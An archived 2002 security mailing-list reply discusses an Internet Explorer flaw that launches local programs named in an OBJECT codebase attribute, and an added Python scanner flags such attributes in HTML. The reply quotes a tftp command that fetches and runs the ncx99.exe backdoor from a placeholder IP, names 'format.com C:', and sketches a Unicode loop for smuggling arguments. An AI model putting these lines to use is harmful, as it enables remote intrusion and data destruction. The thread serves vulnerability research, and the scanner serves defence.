Vulnerability Development mailing list archives

Re: Rather large MSIE-hole


From: Slow2Show <sl2sho () yahoo com>
Date: 14 Mar 2002 09:30:05 -0000


In-Reply-To: <20020313125115.A14918 () castleblack darkflame net>

> I haven't tried, since I don't run MS, how about?
> var programName=new Array(
> 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
> 'c:/winnt/system32/ncx99.exe');

I tried your idea, nocon... it seems that the codebase will not let you pass any parameters, so 'C:/WINDOWS/system32/calc.exe' will work, but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe' will not because of the parameters.

I've researched getting this to work by using Unicode chars to see if there was something that you could put in to bypass this... but alas it won't work. Note that spaces are allowed in the directory path, but not after the program name.

so this would work:
'C:/Program Files/intern~1/IEXPLORER.exe'

but these won't:
'C:/Program Files/intern~1/IEXPLORER.exe -k'
'C:/WINDOWS/system32/format.com C:'

// pseudo code... showing the concept of how I tried every Unicode char
// (each iteration builds one candidate path with the character between
// the program name and its argument)
for (var i = 0; i < 65535; i++) {
    var c = String.fromCharCode(i);
    var candidate = 'C:/Program Files/intern~/IEXPLORER.exe' + c + '-k';
    // ... try `candidate` as the codebase value
}

The only possible attack vector I can see from this is if you had prior knowledge of the path of a program on a system that you wanted to execute. This is slightly dangerous if you are running as admin, because the telnet server could be started by launching %SYSTEMROOT%\system32\tlntsess.exe. But you would still need a valid user/pass to gain access. (And you should be slapped if you are web browsing as admin.)

I'm glad this hole turned out to be relatively benign... this would have turned into a really dangerous hole, and not just an annoying one, if parameters could be passed.

But don't forget that script kiddies could "boot" you by executing logoff.exe/tsshutdn.exe/tsdiscon.exe.

If anybody else finds a way of getting the parameters to work... please post to the list.

lata,

-Slow2Show-
University of Florida

p.s. see ya @ SANS2002...party Florida style!!
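The thread turns on IE honouring a local filesystem path in an OBJECT/EMBED codebase attribute, and on that path being accepted only without arguments. The scanner below is an added example, not code from the post or from any of its participants: it parses an HTML page or mail body, flags codebase attributes that point at a local path (drive letter, file: URL or UNC share) and records whether the value carries trailing arguments after an executable name, the distinction the post describes. The sample HTML, the tag set checked and the attribute shape are constructed assumptions for illustration.

```python
"""Flag HTML that points an OBJECT/EMBED/APPLET codebase at a local path.

Added example (not from the mailing-list post). Assumption: the page
under review is plain HTML and the attribute of interest is `codebase`
on object/embed/applet tags; the sample document below is constructed.
"""
import re
from html.parser import HTMLParser

# Local filesystem reference at the start of the value:
#   C:/..., C:\..., file:///C:/..., file://C:/..., \\server\share, file://server
LOCAL_PATH = re.compile(
    r"^\s*(?:file:(?://)?/?)?[a-z]:[\\/]"  # drive letter, optionally file:-prefixed
    r"|^\s*\\\\"                           # UNC path
    r"|^\s*file:",                         # any other file: URL
    re.IGNORECASE,
)

# Executable name followed by whitespace and more text, i.e. arguments.
EXE_WITH_ARGS = re.compile(r"\.(?:exe|com|bat|cmd)\s+\S", re.IGNORECASE)

# Tags whose codebase attribute the scanner inspects (constructed assumption).
CODEBASE_TAGS = ("object", "embed", "applet")


class CodebaseScanner(HTMLParser):
    """Collects one finding per codebase attribute that names a local path."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        if tag not in CODEBASE_TAGS:
            return
        for name, value in attrs:
            if name != "codebase" or value is None:
                continue
            if LOCAL_PATH.search(value):
                self.findings.append({
                    "tag": tag,
                    "codebase": value,
                    "has_arguments": bool(EXE_WITH_ARGS.search(value)),
                })


def scan_html(html):
    """Return a list of findings for local-path codebase attributes in `html`."""
    scanner = CodebaseScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: two bare local executables, one with an argument,
# and one ordinary remote codebase that must not be flagged.
SAMPLE_HTML = """
<html><body>
<object codebase="C:/WINDOWS/system32/calc.exe"></object>
<object codebase="C:/Program Files/intern~1/IEXPLORER.exe -k"></object>
<embed codebase="file:///C:/Program Files/intern~1/IEXPLORER.exe">
<object codebase="http://example.com/activex.cab"></object>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

The spaces inside "Program Files" do not trigger the argument check because it only fires on whitespace after an executable extension; that mirrors the observation in the post that spaces are tolerated in the directory portion but not after the program name. A defender would still treat every local-path hit as a finding, arguments or not, since a bare path to an existing executable is exactly the case the post says works.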

